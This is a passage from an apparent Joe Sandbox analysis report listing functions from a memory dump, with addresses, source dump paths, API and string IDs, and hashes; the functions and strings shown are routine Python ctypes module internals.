                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dealloc$Arg_AttrDict_Err_FormatObject_ParseSizeStringTuple_Updatememcpy
                                                                                                                                                                                                                          • String ID: %.200s.__dict__ must be a dictionary, not %.200s$O!s#$__dict__
                                                                                                                                                                                                                          • API String ID: 111561578-4068157617
                                                                                                                                                                                                                          • Opcode ID: 58e6a00ed9d267c7dd8526cada96408385d97ceb47587c6d35058d8e66b14ce7
                                                                                                                                                                                                                          • Instruction ID: daee6d019701e18aefcbe87488ad599b46d5f6bf77806eea58a4cd0535ff7483
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58e6a00ed9d267c7dd8526cada96408385d97ceb47587c6d35058d8e66b14ce7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53312772A09B8681EB809FEAE8440B873A4FB89BE4B584136DB5D47761DF3CE494C300
                                                                                                                                                                                                                          Function 00007FF8BFB738F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dealloc$ArgsCallErr_FunctionObject_Occurredffi_callffi_prep_cifmemset
                                                                                                                                                                                                                          • String ID: argument %zd:
                                                                                                                                                                                                                          • API String ID: 3446152234-2109984780
                                                                                                                                                                                                                          • Opcode ID: c920e970e24f574a3f25393bfb0e58e5599c1a73d600db7067e46461ab7b5ab3
                                                                                                                                                                                                                          • Instruction ID: f82d38600435c94539692823037c7c1039e85f8cf3a786ac204744820d54e13b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c920e970e24f574a3f25393bfb0e58e5599c1a73d600db7067e46461ab7b5ab3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EA1B023B09B8285EA608FA9D8402B96B60FF40BE4F584636DB6E47BD5DF3CE5518300
                                                                                                                                                                                                                          Function 00007FF8BFB7E8C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String$Free$Err_Mem_$AllocCharFormatUnicode_Wide
                                                                                                                                                                                                                          • String ID: String too long for BSTR$unicode string expected instead of %s instance
                                                                                                                                                                                                                          • API String ID: 920172908-178309214
                                                                                                                                                                                                                          • Opcode ID: 4149c1a81c04bdb3fdc818633bc0b3cb66efdfdd670b271a8ed2ce78be49526d
                                                                                                                                                                                                                          • Instruction ID: 4b5324d77e8f56e985c4af0e86cc2dda57dbd9ac910277eed4f750e025a6ba68
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4149c1a81c04bdb3fdc818633bc0b3cb66efdfdd670b271a8ed2ce78be49526d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F721F326A1AA4681EA94CFDAE8540782760FFC8BD0F544036EB4E87765DE3CE498C301
                                                                                                                                                                                                                          Function 00007FF8BFB7A2D0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$DeallocString$Formatmemcpy
                                                                                                                                                                                                                          • String ID: byte string too long$bytes expected instead of %s instance$can't delete attribute
                                                                                                                                                                                                                          • API String ID: 1948958528-1866040848
                                                                                                                                                                                                                          • Opcode ID: 0089817566cd73aeb9c57cc19a0e3cf605cb8c4e165fe2323640650f8db5ae90
                                                                                                                                                                                                                          • Instruction ID: 0b4ba0c1f71c568ae2da59748167b1e2c025f755f6426a31e1424f6942f9d65f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0089817566cd73aeb9c57cc19a0e3cf605cb8c4e165fe2323640650f8db5ae90
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1213771A08A4281EB909FAEE8801BDB7A5FB85FD8F105132DB1E47A65DF3CE485C300
                                                                                                                                                                                                                          Function 00007FF8BFB7BEEC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dealloc
                                                                                                                                                                                                                          • String ID: wrong type
                                                                                                                                                                                                                          • API String ID: 3617616757-2191655096
                                                                                                                                                                                                                          • Opcode ID: 0b4988f90789b608884a0820312154a766ff298a7a478ea2e6fe614ac435d5fe
                                                                                                                                                                                                                          • Instruction ID: 0cad9f02691801400bcd75e6172d3e7b3581136e1c9949ab18bf30729801e771
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b4988f90789b608884a0820312154a766ff298a7a478ea2e6fe614ac435d5fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5513C61A0AA4381FE549F9DD9501796BA2EF84BC0F588435DB0E4B7A9EF2CF894C740
                                                                                                                                                                                                                          Function 00007FF8BFB728C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallDeallocDict_Err_MallocMem_MemoryObjectObject_Update
                                                                                                                                                                                                                          • String ID: X{}
                                                                                                                                                                                                                          • API String ID: 3334104440-2140212134
                                                                                                                                                                                                                          • Opcode ID: 993215c533787af24a8ddded9fa27fbbebaacf7f242f7e515d88610f26fd57d5
                                                                                                                                                                                                                          • Instruction ID: 777695070a465879e8142fd289ac50bc93ef4738ae5d48bc954743cf291dd9e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 993215c533787af24a8ddded9fa27fbbebaacf7f242f7e515d88610f26fd57d5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9316D31A0DB8285EB558FA9E9542B87BA0EF89BD0F588530CB5E43B95DF3CE584C700
                                                                                                                                                                                                                          Function 00007FF8BFB7A23C Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Buffer_Err_ReleaseString$BufferObject_memcpy
                                                                                                                                                                                                                          • String ID: byte string too long$cannot delete attribute
                                                                                                                                                                                                                          • API String ID: 1128862751-688604938
                                                                                                                                                                                                                          • Opcode ID: 865899bc16da5b7e00948234228a90162568b208c35d8bfa1d74ae81175d88b9
                                                                                                                                                                                                                          • Instruction ID: 30309f05f6ebdcb279f0e96bad639b8c0f57db46c84a960412b0ef56de573119
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 865899bc16da5b7e00948234228a90162568b208c35d8bfa1d74ae81175d88b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0011761A1AA4681EF50EFE9E8500B96360FFC4FD5B504232DA5E86AA5DE2DE544C700
                                                                                                                                                                                                                          Function 00007FF8BFB7E050 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$Arg_FormatNumber_OccurredSsize_tSubtypeTupleType_Unpack
                                                                                                                                                                                                                          • String ID: byref$byref() argument must be a ctypes instance, not '%s'
                                                                                                                                                                                                                          • API String ID: 3717719007-1446499295
                                                                                                                                                                                                                          • Opcode ID: c4fcb0d2af70f6561cc9c37071ef1dbce31ab30e50856d7ec59f5ee97f65bfa5
                                                                                                                                                                                                                          • Instruction ID: 16d43837195dacf5edf2a0d808a9880089ed45eeb75a51817458e60444b7074c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4fcb0d2af70f6561cc9c37071ef1dbce31ab30e50856d7ec59f5ee97f65bfa5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A213426A09A4681EB00CBA9E8506B877A0FF88BE4F044636CB6E87791DF7DE554C301
                                                                                                                                                                                                                          Function 00007FF8BFB7BAD4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 51stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: SubtypeType_$Err_FormatUnicode_strchr
                                                                                                                                                                                                                          • String ID: 'out' parameter %d must be a pointer type, not %s$PzZ
                                                                                                                                                                                                                          • API String ID: 3227297879-2360062653
                                                                                                                                                                                                                          • Opcode ID: 213c68ae6acd5428f3f9006fad45eff56139af005e426612322a5b6ed675897c
                                                                                                                                                                                                                          • Instruction ID: 043a6a045711c4e389593e92973763f62059c7bfa9f88de0d5bf61eebb494014
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 213c68ae6acd5428f3f9006fad45eff56139af005e426612322a5b6ed675897c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94212925B09A46D5EB149F99E44127827A1FFC4FC8F088031DF4E873AADE2CE885C740
                                                                                                                                                                                                                          Function 00007FF8BFB7C688 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: SubtypeType_$Err_FormatUnicode_strchr
                                                                                                                                                                                                                          • String ID: cast() argument 2 must be a pointer type, not %s$sPzUZXO
                                                                                                                                                                                                                          • API String ID: 3227297879-1038790478
                                                                                                                                                                                                                          • Opcode ID: 965fc26b6704ef5e374ef7ffa5f62dd4853d341b82561116f5d95d31500702b8
                                                                                                                                                                                                                          • Instruction ID: 5963908313302226d692856038e902f4be350d0e05f486ff6b0442196b1be6a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 965fc26b6704ef5e374ef7ffa5f62dd4853d341b82561116f5d95d31500702b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F2121A5B0964792EF549F9DD4503B82760EF94FC5F68403ACB4D47261DF2CE984C350
                                                                                                                                                                                                                          Function 00007FF8BFB7F2AC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharErr_FormatUnicode_Wide
                                                                                                                                                                                                                          • String ID: string too long (%zd, maximum length %zd)$unicode string expected instead of %s instance
                                                                                                                                                                                                                          • API String ID: 2195588020-2061977717
                                                                                                                                                                                                                          • Opcode ID: 7ac85017326a6a3638da0ed184420ce377bd8bc92a60fdcc85f64a8ab54a6b3d
                                                                                                                                                                                                                          • Instruction ID: c5fc009ec3f548c3894bbedc78328e5d77fd89fea6a8d2f9512da8bfb854b9a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ac85017326a6a3638da0ed184420ce377bd8bc92a60fdcc85f64a8ab54a6b3d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F119D64B09B4281EA40DB9AE8101B867A0FF88FE4B544232EF1E53BA5DF3CE485C340
                                                                                                                                                                                                                          Function 00007FF8BFB7E2A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dealloc$Arg_FromLongLong_ParseTuple
                                                                                                                                                                                                                          • String ID: OO:CopyComPointer
                                                                                                                                                                                                                          • API String ID: 1908940310-822416302
                                                                                                                                                                                                                          • Opcode ID: 7e00673205eba28370de99c8282450b0b613e4871889fe95876d84c7ac623f1a
                                                                                                                                                                                                                          • Instruction ID: a1269bbc42668fb685e6eac6bf97d8f3b4b6469a22827e2337885d69e2b643b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e00673205eba28370de99c8282450b0b613e4871889fe95876d84c7ac623f1a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64214C36B09B4285EB169FB9D8501BC2760BF88BE8F494635DB5E47A94CF3CE055C301
                                                                                                                                                                                                                          Function 00007FF8BFB7169C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_Long$Long_MaskOccurredStringSubtypeType_Unsigned
                                                                                                                                                                                                                          • String ID: int expected instead of float
                                                                                                                                                                                                                          • API String ID: 3681780221-2411840549
                                                                                                                                                                                                                          • Opcode ID: 5d8bac60d503e20a68a38e0428ffacd6868880521a5a232ada2c39c0a41308f1
                                                                                                                                                                                                                          • Instruction ID: 681ce9f7e3832852fa1cc8c13991b109dc58363002de12897640769ad404d3e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d8bac60d503e20a68a38e0428ffacd6868880521a5a232ada2c39c0a41308f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B011D21B09A4281EB149FADF9440752765BF88BF5B289331DB6E866E1EF2CE494C300
                                                                                                                                                                                                                          Function 00007FF8BFB724B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$LongLong_MaskOccurredStringSubtypeType_Unsigned
                                                                                                                                                                                                                          • String ID: int expected instead of float
                                                                                                                                                                                                                          • API String ID: 2539109060-2411840549
                                                                                                                                                                                                                          • Opcode ID: d580dedb6eb4beabc372b8108e2d76eacac62e2364c24e9b9c54f12f7d4f31b0
                                                                                                                                                                                                                          • Instruction ID: a8a6a27c8fdcd43582f2d038caad9ba92ef7118cdb42d1fa2fa932def82bb590
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d580dedb6eb4beabc372b8108e2d76eacac62e2364c24e9b9c54f12f7d4f31b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97013121B0DA4285EB149FADE8540793761BF89BE4B189630DB2E826E5EF2CE444C700
                                                                                                                                                                                                                          Function 00007FF8BFB71254 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • bytes or integer address expected instead of %s instance, xrefs: 00007FF8BFB77033
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Long$Bytes_Err_FormatLong_MaskStringUnsigned
                                                                                                                                                                                                                          • String ID: bytes or integer address expected instead of %s instance
                                                                                                                                                                                                                          • API String ID: 1546367030-706233300
                                                                                                                                                                                                                          • Opcode ID: c5b2b3cdae5104d5393cc6efd3c4e60599be666788a45162c92a9ba1b46f74d2
                                                                                                                                                                                                                          • Instruction ID: 196f5e872d13cd96e5e3e21ba8753c732fe00efa2aaffd81e7e8fcc6d1621934
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5b2b3cdae5104d5393cc6efd3c4e60599be666788a45162c92a9ba1b46f74d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B11D376A1AA46C1EB549F9AE8802783771FB99BD4F148532CB4E83361DE3CE495C300
                                                                                                                                                                                                                          Function 00007FF8BFB74EB4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
